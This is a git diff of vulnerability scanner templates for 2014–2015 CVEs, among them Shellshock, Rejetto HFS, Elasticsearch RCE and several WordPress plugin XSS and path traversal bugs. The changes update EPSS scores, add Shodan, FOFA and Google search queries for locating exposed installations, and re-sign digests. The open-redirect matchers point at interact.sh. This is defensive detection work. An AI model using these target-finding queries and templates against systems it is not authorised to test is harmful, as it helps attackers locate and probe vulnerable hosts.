a/http/cves/2014/CVE-2014-4558.yaml b/http/cves/2014/CVE-2014-4558.yaml index f87981322e..8a0098ac29 100644 --- a/http/cves/2014/CVE-2014-4558.yaml +++ b/http/cves/2014/CVE-2014-4558.yaml @@ -13,21 +13,21 @@ info: - https://wpscan.com/vulnerability/37d7936a-165f-4c37-84a6-7ba5b59a0301 - https://nvd.nist.gov/vuln/detail/CVE-2014-4558 - http://codevigilant.com/disclosure/wp-plugin-swipehq-payment-gateway-woocommerce-a3-cross-site-scripting-xss + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2014-4558 cwe-id: CWE-79 epss-score: 0.00135 - epss-percentile: 0.48556 + epss-percentile: 0.48718 cpe: cpe:2.3:a:cybercompany:swipehq-payment-gateway-woocommerce:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 + max-request: 2 vendor: cybercompany - product: swipehq-payment-gateway-woocommerce + product: "swipehq-payment-gateway-woocommerce" framework: wordpress tags: cve2014,cve,wpscan,wordpress,wp-plugin,xss,woocommerce,unauth,cybercompany - flow: http(1) && http(2) http: @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022055663e58bcf6513417455b0efb0c97cfbac07cc9b0a2f73d2e0d75584454220102205bcd4da9178ae324924159c8150a0ff2df766bc8e7b3ec9b711da13f1de2cd8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022064be5bc2bc27f5573229fb1e06d1b6fdaf546e848c1cf6b87b3e55b1634151b3022100cbb7ad6637c2fab9f331f6f521522a84081a888553c1b902d966ed0dc5087b5c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4561.yaml b/http/cves/2014/CVE-2014-4561.yaml index b1e5187f18..a0a64e7e71 100644 --- a/http/cves/2014/CVE-2014-4561.yaml +++ b/http/cves/2014/CVE-2014-4561.yaml @@ -20,15 +20,14 @@ info: cve-id: CVE-2014-4561 cwe-id: CWE-79 epss-score: 0.00098 - epss-percentile: 0.40364 + epss-percentile: 0.40792 cpe: cpe:2.3:a:ultimate-weather_project:ultimate-weather:1.0:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - vendor: ultimate-weather_project - product: ultimate-weather + max-request: 2 + vendor: "ultimate-weather_project" + product: "ultimate-weather" framework: wordpress tags: cve2014,cve,wordpress,wp-plugin,xss,weather,wpscan,unauth,ultimate-weather_project - flow: http(1) && http(2) http: @@ -64,4 +63,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ec3f2f4560e6231b16182d21760fdcc4a70b5d2aee0351cfbb9af25a402e2cad022100ba3b535bfbc3654a873212a9181fa6e19aa7a5dd22f2e02ff1fe3e15527b287e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b59be00dd3551a903cf72f6efd3a7fde9a73f0d886633f10aabd032ae3293d39022100a4b5280ea8d9f4565ce8a0b3fe00a59c4947a6ba70bf76492abf3437937dacae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4592.yaml b/http/cves/2014/CVE-2014-4592.yaml index 51756c4c86..a649659273 100644 --- a/http/cves/2014/CVE-2014-4592.yaml +++ b/http/cves/2014/CVE-2014-4592.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2014-4592 cwe-id: CWE-79 epss-score: 0.00135 - epss-percentile: 0.47838 + epss-percentile: 0.48718 cpe: cpe:2.3:a:czepol:wp-planet:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a2bd4ee7dd4410fcf6088eb1ea98117e6cb1d07778ec987702193ec58f1a32d2022071f4dedaed29b1e6c680e09b1e91688a875574e60a2b29ceb986f8ee3ec5d2fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022077481966c450edd18ee9b5bd7cf27a6eb455f479a6b90d8599c0b11f7285f63d0221008d427a5a6faf2554c216e4025cb7c3a9a58217dbea37d4fc696acd9c44278f2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4940.yaml b/http/cves/2014/CVE-2014-4940.yaml index 90fe1a1ae5..74f2b7ba36 100644 --- a/http/cves/2014/CVE-2014-4940.yaml +++ b/http/cves/2014/CVE-2014-4940.yaml @@ -19,8 +19,8 @@ info: cvss-score: 5 cve-id: CVE-2014-4940 cwe-id: CWE-22 - epss-score: 0.03212 - epss-percentile: 0.90985 + epss-score: 0.05292 + epss-percentile: 0.93046 cpe: cpe:2.3:a:tera_charts_plugin_project:tera-charts:0.1:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f7fabab204109ff54cd90e8f812aa822a90c66eb03d80cebef59c28ba65c19920221009c5c4a4fbb6cdd88155f2a4e88f39da697ce828dac7d469c80e87613d4103203:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fdcfab4922d8796050d75ce54d86d802b84c2037d6d63c97d6389b57ae60133002203a8bde99ea662cc20e306372114e7105ad88ec62a42c7812e0a13c7d085109d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-5258.yaml b/http/cves/2014/CVE-2014-5258.yaml index 8df99e4d08..962a5e9d0f 100644 --- a/http/cves/2014/CVE-2014-5258.yaml +++ b/http/cves/2014/CVE-2014-5258.yaml @@ -27,6 +27,7 @@ info: max-request: 1 vendor: webedition product: webedition_cms + shodan-query: cpe:"cpe:2.3:a:webedition:webedition_cms" tags: cve2014,cve,edb,packetstorm,lfi,webedition http: @@ -43,4 +44,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206b9d4be5067970ffa3d8e02079c4abf8441c982e0b6c0c19941b0a7e203321fc02201fede3e0462fdb7ea5a4287170f517900610ef02f321923bb5a57227cf800b54:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f41fce0fe4ea55afe08e392d357d518f76a79c6defb6ca8511b388f8f100022a022050e3e10019d9333356dbe6e594d74c2e80530f624096c57c74b70f954cbb276f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-5368.yaml b/http/cves/2014/CVE-2014-5368.yaml index 92a45f5fbf..d3b0891311 100644 --- a/http/cves/2014/CVE-2014-5368.yaml +++ b/http/cves/2014/CVE-2014-5368.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2014-5368 cwe-id: CWE-22 epss-score: 0.09191 - epss-percentile: 0.94512 + epss-percentile: 0.94648 cpe: cpe:2.3:a:wp_content_source_control_project:wp_content_source_control:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d69ee1fd512ebb21e3ef12903964a91f9d7ada78be70bf55c71ec977f4900eb2022007f9bf1c552bd638825024917e8ce6ed2768429fc5db5f1f78eda30f4cf9bebe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210084f4f052d7c330fa7eb3b57ec97ceabf3446b9e799ef733dccbb4eed07a3b65e022100cad135da770e7c26f05d404874a0a22b5db7488fb5d53a5447dbbf8150c90d20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-6271.yaml b/http/cves/2014/CVE-2014-6271.yaml index b1bdf04366..d39748ec44 100644 --- a/http/cves/2014/CVE-2014-6271.yaml +++ b/http/cves/2014/CVE-2014-6271.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2014-6271 cwe-id: CWE-78 epss-score: 0.97559 - epss-percentile: 0.99997 + epss-percentile: 0.99998 cpe: cpe:2.3:a:gnu:bash:1.14.0:*:*:*:*:*:*:* metadata: max-request: 8 @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ffba8f39e1fa9c971f6701509b6aa0b2df388f4e902ae6270d75ccfc573d2a8a0220432aac2c8da61839bf96bcceb0e1e3f10c6cf2755f8c2006d438a53032d4a7ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f262c17c2d38c200c4f64eaff624d6ca4903149a5c9379d1b1de592f06230189022015ccc14685fc5f1018e9399f29d60987d59ed2466775e62810caa949ec8cc514:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-6287.yaml b/http/cves/2014/CVE-2014-6287.yaml index 5b7d648f67..6c9f4ac9a0 100644 --- a/http/cves/2014/CVE-2014-6287.yaml +++ b/http/cves/2014/CVE-2014-6287.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: 'CVE-2014-6287' cwe-id: CWE-94 - epss-score: 0.97289 - epss-percentile: 0.99851 + epss-score: 0.97341 + epss-percentile: 0.99889 cpe: cpe:2.3:a:rejetto:http_file_server:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: rejetto product: http_file_server shodan-query: http.favicon.hash:2124459909 + fofa-query: icon_hash=2124459909 tags: cve2014,cve,packetstorm,msf,hfs,rce,kev,rejetto variables: str1: '{{rand_base(6)}}' @@ -57,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204bde1c3f42a0592f723d6907f857453ffc1cbaeade6b35e9f6d475fdbdf132c9022100e2f30a443e5904e106b93955a85dde211a5249aead2a75f789325c42c40efadc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207c77d8dec5838899fb0b5bcaaa704ce03794019ac3eee7ab38c6fc2b89ea7cb802206d118db82dbc520eacf12ac8e3bdd3dace23e753cf0cf2d06c6e23342a0c7273:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-6308.yaml b/http/cves/2014/CVE-2014-6308.yaml index 8a02870d18..bd14905d05 100644 --- a/http/cves/2014/CVE-2014-6308.yaml +++ b/http/cves/2014/CVE-2014-6308.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2014-6308 cwe-id: CWE-22 epss-score: 0.0922 - epss-percentile: 0.94519 + epss-percentile: 0.94654 cpe: cpe:2.3:a:osclass:osclass:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b55ba5c5bc0603bce568d991022be9818e26de9699fdecf5a734aa850dc13200022042473693f82c1c425062e207b10679c75162af12660a60d0038719261ec111d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022037184abecbf001ce5de1e8b72c72ffeb6653bfe803843bfda016abc44b6ce7a8022036b233f55e5adb22001aee3fc3c9101e59c01f7cf52f2b2db4f38e1471a0d1d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-8676.yaml b/http/cves/2014/CVE-2014-8676.yaml index 2eb92670c9..ec7d0a1987 100644 --- a/http/cves/2014/CVE-2014-8676.yaml +++ b/http/cves/2014/CVE-2014-8676.yaml @@ -28,6 +28,8 @@ info: max-request: 1 vendor: soplanning product: soplanning + shodan-query: http.html:"soplanning" + fofa-query: body="soplanning" tags: cve2014,cve,packetstorm,edb,seclists,soplanning,lfi,xss http: @@ -44,4 +46,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206611bdf8fb4c40e1d04dce364dce4905c11bbe2266ca7465719b55cf98d7949602207babdd83687bb04e4175613fe704b5c7b653537bbc366a9c8822e295b1cf16fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220715636195b40ff991c03fdb2384200a99a22e309ab3dc2f6cb3f7a2c6c28719a02206a0582db5e2daabfcb4749bc783bb844f0733b0716db0ee37e9a8e8780fdc9ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-8682.yaml b/http/cves/2014/CVE-2014-8682.yaml index 321ab2db3e..1cab9ef267 100644 --- a/http/cves/2014/CVE-2014-8682.yaml +++ b/http/cves/2014/CVE-2014-8682.yaml @@ -28,7 +28,12 @@ info: max-request: 1 vendor: gogits product: gogs - shodan-query: title:"Sign In - Gogs" + shodan-query: + - title:"Sign In - Gogs" + - http.title:"sign in - gogs" + - cpe:"cpe:2.3:a:gogs:gogs" + fofa-query: title="sign in - gogs" + google-query: intitle:"sign in - gogs" tags: cve2014,cve,gogs,seclists,packetstorm,edb,sqli,gogits http: @@ -49,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100814319b746978b7ca718b8e25ca06acff4cad96360cbdef067269198629865cc02203d59471b74f7036f8c629f2e3a72650ce063c6c2bcf30ed8a1165aad0b4935ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100919cc2d724473a5c04c9c70bad522097e47a5a26adbc29e027a8404b23519791022100ef992ab080a2ac23e8737c5108975f97aea532772b408c87575b8d5de806c845:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-8799.yaml b/http/cves/2014/CVE-2014-8799.yaml index dd9b9f18af..3b501be0a0 100644 --- a/http/cves/2014/CVE-2014-8799.yaml +++ b/http/cves/2014/CVE-2014-8799.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2014-8799 cwe-id: CWE-22 epss-score: 0.17844 - epss-percentile: 0.96039 + epss-percentile: 0.9615 cpe: cpe:2.3:a:dukapress:dukapress:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204edbc71eff8a4e2f830a6b91adba5649b330babc92cb13db3bc72f9eeadeeaed022032a4104312eed8dab0af4f004d133ef1c781de314cd466bcef35194a980c55c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022012ec28b7ae2fa5ce33f3b849a618ce6d294d4f289985e633959927d2448b8cad022100ece7f22daa65a7bd0eebb32142e90b3ce9f976cade0071f9690cdc7e62bac780:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9094.yaml b/http/cves/2014/CVE-2014-9094.yaml index 2593cc8aa0..74a8916d62 100644 --- a/http/cves/2014/CVE-2014-9094.yaml +++ b/http/cves/2014/CVE-2014-9094.yaml @@ -24,13 +24,12 @@ info: epss-percentile: 0.96912 cpe: cpe:2.3:a:digitalzoomstudio:video_gallery:-:*:*:*:*:wordpress:*:* metadata: - max-request: 1 + max-request: 2 vendor: digitalzoomstudio - product: video_gallery + product: "video_gallery" framework: wordpress - google-query: inurl:"/wp-content/plugins/dzs-videogallery" + google-query: "inurl:\"/wp-content/plugins/dzs-videogallery\"" tags: cve2014,cve,wordpress,xss,wp-plugin,seclists,digitalzoomstudio - flow: http(1) && http(2) http: @@ -63,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f33fbedc30570d477f0ca3fdf865e0b9d6a89eb72953eab70581c1657322d4d802204db1cd868a9f5b6daafb09716cab8669f1539216ffc9af3df54e317613be7368:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220762eaa5f298ce4378195e2e07e6a0d2245d1d5543b50fe7abd046fd74c5d54aa0220378220d9a1520bd199eb97b657a064dd610c742cbc1098ca9a7ac1f1a2e6bdb9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9180.yaml b/http/cves/2014/CVE-2014-9180.yaml index faf2b9414d..dd76b22a25 100644 --- a/http/cves/2014/CVE-2014-9180.yaml +++ b/http/cves/2014/CVE-2014-9180.yaml @@ -16,15 +16,19 @@ info: cvss-score: 5 cve-id: CVE-2014-9180 cwe-id: CWE-601 - epss-score: 0.00285 - epss-percentile: 0.6809 + epss-score: 0.00214 + epss-percentile: 0.59443 cpe: cpe:2.3:a:eleanor-cms:eleanor_cms:-:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: eleanor-cms product: eleanor_cms - shodan-query: html:"eleanor" + shodan-query: + - html:"eleanor" + - http.html:"eleanor" + - cpe:"cpe:2.3:a:eleanor-cms:eleanor_cms" + fofa-query: body="eleanor" tags: cve2014,cve,packetstorm,eleanor,cms,redirect,eleanor-cms http: @@ -37,4 +41,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 490a004630440220446a71d044997875a6e25df63044f0a0857752c262af93c4d2ad395a2e57d16c0220515a5679ead82478d29fb9a3415e6a433b25596bd8f56f8aabdb0724757cd73c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bd71e2691f09ef0003581882f237edd193e38974f3a5bb92f19f9bf1b08f63c9022100947d726d2f4e172db471b3baf8e19df63b096919885aa2168129ab9583efe4cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9444.yaml b/http/cves/2014/CVE-2014-9444.yaml index 4e01a22313..ab4eeed546 100644 --- a/http/cves/2014/CVE-2014-9444.yaml +++ b/http/cves/2014/CVE-2014-9444.yaml @@ -13,13 +13,14 @@ info: - https://wpscan.com/vulnerability/f0739b1e-22dc-4ca6-ad83-a0e80228e3c7 - https://nvd.nist.gov/vuln/detail/CVE-2014-9444 - http://packetstormsecurity.com/files/129749/WordPress-Frontend-Uploader-0.9.2-Cross-Site-Scripting.html + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2014-9444 cwe-id: CWE-79 - epss-score: 0.00287 - epss-percentile: 0.65501 + epss-score: 0.00619 + epss-percentile: 0.78788 cpe: cpe:2.3:a:frontend_uploader_project:frontend_uploader:0.9.2:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -48,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d63e192fa95e5914ae00c6a2f55a96eef98aeb85eee3f4171b3af2f9d3e52f6d0220578a283149c3a3345f1443cffed1f5bfee0ea458d32f450beabaebe2500f1e4b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022047b35642f70a3b53211ace11f861e4765249fb4244c05f753ab279f89879e116022100c4a70fe22de8bb7f0a109f44b262232d559cc447faac3c2b2cb095908d770b8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9606.yaml b/http/cves/2014/CVE-2014-9606.yaml index 20225da1f4..326cfe37ed 100644 --- a/http/cves/2014/CVE-2014-9606.yaml +++ b/http/cves/2014/CVE-2014-9606.yaml @@ -13,13 +13,14 @@ info: - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz - https://nvd.nist.gov/vuln/detail/CVE-2014-9606 - http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2014-9606 cwe-id: CWE-79 epss-score: 0.00102 - epss-percentile: 0.41261 + epss-percentile: 0.41716 cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -47,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210080cd960c9becf8e609afed2036ce9d79e616dceacf52cf5865510c5c1f59220b022100d6ab15602efd08d89ec0f184f8f09651aa1a5b71bbae67567e34933901ec3cc9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f25f32406e3e481ad9b2f50ea3be976ecd9a39128b79d8d6e6fc08bfddd80bac022100c8d8159a08640e3530b34a713a6f1112f13caa7fbb39ae1c1f45b218af9e2c6f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9607.yaml b/http/cves/2014/CVE-2014-9607.yaml index e00d43f46f..32545626db 100644 --- a/http/cves/2014/CVE-2014-9607.yaml +++ b/http/cves/2014/CVE-2014-9607.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2014-9607 cwe-id: CWE-79 epss-score: 0.00102 - epss-percentile: 0.40591 + epss-percentile: 0.41716 cpe: cpe:2.3:a:netsweeper:netsweeper:4.0.3:*:*:*:*:*:*:* metadata: max-request: 1 @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201aa63eb48fb97f26c497ba51d0b774678d7f99181ff592e8245940df0586f135022100ec53c24be8fe6c849d5700ba693ce9821767849c3c764eef8459fe2120e546fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f8c58b7ce75987ee10d4a7a2dc87f86c3d65bd50843fac13a7b0d0641c1f20a00220570389114da5233ffcd4ccc05632c183ff57e6dc07babf80b21d2818decee813:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9608.yaml b/http/cves/2014/CVE-2014-9608.yaml index 5561db4d36..fafa68c4cf 100644 --- a/http/cves/2014/CVE-2014-9608.yaml +++ b/http/cves/2014/CVE-2014-9608.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2014-9608 cwe-id: CWE-79 epss-score: 0.00102 - epss-percentile: 0.40591 + epss-percentile: 0.41716 cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203ce0d1e40367b31eefec71137f6bf16ab3b345be2f2b7a7797a9784aa65eb723022014b4a8a7ae8933afffede51f1d4fd8208e04a33bebae97310111ca8fbbf01ab8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100df4d1ce1a9c4a7c7ec1f9f7c4a2dea139740caed42f72b048f16634be7028fcb022040deb4ef640f0efcd128fe37ceaa1b08b48219bddb3695ccbd4789562061356f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9614.yaml b/http/cves/2014/CVE-2014-9614.yaml index 48e1769a8f..1e5165fe0c 100644 --- a/http/cves/2014/CVE-2014-9614.yaml +++ b/http/cves/2014/CVE-2014-9614.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2014-9614 cwe-id: CWE-798 epss-score: 0.01433 - epss-percentile: 0.85223 + epss-percentile: 0.8655 cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -55,4 +55,4 @@ http: - type: status status: - 302 -# digest: 4a0a004730450221008ca7c8e2f8971e12c194148bb00ee6af61b7f7402b62a5b0e4b98d020d96eeca0220052a3891b6a4b52003d8e309f5a8c7af3005bbce6e11e69a25f6908273c8bebf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202f2136d9d8c06c91744feb7dc1c42ffe6f13823841c3487a6844921ceaf142b2022003c2cbb6c9e75bae775fe0fc06e8ee12133e6d53c40b011a5d8b35cac33287ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9617.yaml b/http/cves/2014/CVE-2014-9617.yaml index 2be4ac953e..93d5d6b2c2 100644 --- a/http/cves/2014/CVE-2014-9617.yaml +++ b/http/cves/2014/CVE-2014-9617.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2014-9617 cwe-id: CWE-601 epss-score: 0.00109 - epss-percentile: 0.43869 + epss-percentile: 0.44022 cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -38,4 +38,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 490a00463044022006182b3df441f29283ee673c281717eda7a779b431ecc2f9cb6f9a85fd6dfc88022074682e3692cd0985fdc463c552d02b2315af9ba8dd367b8085661de9f9b79108:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201052d6d8b289bb24eb8e28b9777c3fe5d3dba8762e0a7d85949710ac75c87ecc0220548e894c1cd3f8a1cb3c9e71d58c48b458039bb761d70f2f5037e5e1a39f4afd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9618.yaml b/http/cves/2014/CVE-2014-9618.yaml index ccc915382c..1882749a65 100644 --- a/http/cves/2014/CVE-2014-9618.yaml +++ b/http/cves/2014/CVE-2014-9618.yaml @@ -15,13 +15,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2014-9618 - https://www.exploit-db.com/exploits/37933/ - http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2014-9618 cwe-id: CWE-287 epss-score: 0.03433 - epss-percentile: 0.90527 + epss-percentile: 0.91476 cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -47,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220110e65478297a1f1e19a5e98a5f65f7e6bb674ad23a3824ba952a06b72b3736f02210088cd00b58b916cf718bfd03fd71bfd051e0f737bec255d7752bfbf60ff169f36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e2c30dafcfaf747bbc1516a801b6f0c0418d72acb0e771939826193d9a93291502204f311d75a2cb0ae12aef112c90a354bd53451d367c99671aed2bd4bd2c4f8621:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-1000005.yaml b/http/cves/2015/CVE-2015-1000005.yaml index 99fd990224..92169aca0b 100644 --- a/http/cves/2015/CVE-2015-1000005.yaml +++ b/http/cves/2015/CVE-2015-1000005.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2015-1000005 cwe-id: CWE-22 - epss-score: 0.047 - epss-percentile: 0.92455 + epss-score: 0.05258 + epss-percentile: 0.93027 cpe: cpe:2.3:a:candidate-application-form_project:candidate-application-form:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c57b8e7f4d7cc5e46b9b3b53dad4d8bdbb23b3395a0e7e318ae97e2084be2eea022029f219dc09c13c76fdbf11a2722ed0594785fa3517c8c439fcd5ea6da661a02f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204f1f475fa4f52e36af22f8c1fd174fd227db3220068dd25993f009d04ecac0700220473d7e9f0bccadbcb97eaac77b5bde7a39bf0a25882afc8889ee9f4996cc1805:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-1427.yaml b/http/cves/2015/CVE-2015-1427.yaml index 444756f589..5669854804 100644 --- a/http/cves/2015/CVE-2015-1427.yaml +++ b/http/cves/2015/CVE-2015-1427.yaml @@ -20,13 +20,14 @@ info: cvss-score: 7.5 cve-id: CVE-2015-1427 cwe-id: CWE-284 - epss-score: 0.85974 - epss-percentile: 0.98485 + epss-score: 0.87385 + epss-percentile: 0.98629 cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: elasticsearch product: elasticsearch + fofa-query: index_not_found_exception tags: cve2015,cve,packetstorm,elastic,rce,elasticsearch,kev http: @@ -64,4 +65,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d29b625c44598d6fd40ec90007af146d602b03e0287b866e32ee90257f77d1da022100c02ac12b1515f84fdbe501346868b0b6d8e31333da3750a76b2e01f9e0f40642:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f0a87139a45778ff044c46bad3780d8ac438f8a75ad5be9dae57584656afba3a022100eac3592c45cd386f902a94e07a5c7915903a6e1bdfd7b5d8a8bdf2af67fbaa38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-1503.yaml b/http/cves/2015/CVE-2015-1503.yaml index 611ec88318..9f3154e95d 100644 --- a/http/cves/2015/CVE-2015-1503.yaml +++ b/http/cves/2015/CVE-2015-1503.yaml @@ -27,7 +27,18 @@ info: max-request: 2 vendor: icewarp product: mail_server - shodan-query: title:"icewarp" + shodan-query: + - title:"icewarp" + - http.title:"icewarp server administration" + - http.title:"icewarp" + - cpe:"cpe:2.3:a:icewarp:mail_server" + fofa-query: + - title="icewarp server administration" + - title="icewarp" + google-query: + - intitle:"icewarp server administration" + - intitle:"icewarp" + - powered by icewarp 10.4.4 tags: cve2015,cve,lfi,mail,packetstorm,icewarp http: @@ -45,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201bd23514796529bf6c27e2ed45c08b9340e59a12f04603253332ae63240298e60221008e8246877e3b62ffa7b8953c44fa788db96ddf30e232a558beca8f4d501588b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f1b6cec92cc5cca66731a816986ddb746c97d46d6d9802824e3eba996852035702204cc6020916fea497fc2e85561d5acf00eeaede0d281dc4786316293e45cc00c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff 